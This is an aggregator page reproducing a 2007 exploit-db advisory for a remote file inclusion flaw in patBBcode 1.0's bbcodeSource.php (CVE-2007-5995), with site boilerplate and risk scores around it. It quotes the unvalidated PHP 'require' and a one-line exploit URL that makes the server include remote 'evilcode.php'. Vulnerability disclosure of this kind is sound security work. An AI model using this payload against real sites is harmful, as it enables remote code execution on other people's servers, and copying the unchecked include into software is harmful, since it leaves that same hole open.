Lucene search
+L

patBBcode 1.0 - 'bbcodeSource.php' Remote File Inclusion

🗓️ 12 Nov 2007 00:00:00Reported by p4sswdType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 24 Views

patBBcode 1.0 Remote File Inclusion vulnerability with example code executio

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-5995
15 Nov 200722:00
cve
cvelist
Cvelist
CVE-2007-5995
15 Nov 200722:00
cvelist
euvd
EUVD
EUVD-2007-5965
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-5995
15 Nov 200722:46
nvd
prion
Prion
Remote file inclusion
15 Nov 200722:46
prion
Link to download:
http://www.php-tools.net/site.php?file=patBBCode/overview.xml

Vuln file:
examples\patExampleGen\bbcodeSource.php

Vuln code:
    if( !isset( $_GET['example'] ) )
        die( 'No example selected.' );

    $exampleId = $_GET['example'];

    ob_start();

    // make the example think it's still in the right place
    chdir( '../' );

    // include the example
    require $exampleId.'.php';

    ob_end_clean();

Exploit:
examples\patExampleGen\bbcodeSource.php?example= http://server.com/evilcode.php

# milw0rm.com [2007-11-12]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Nov 2007 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.02016
24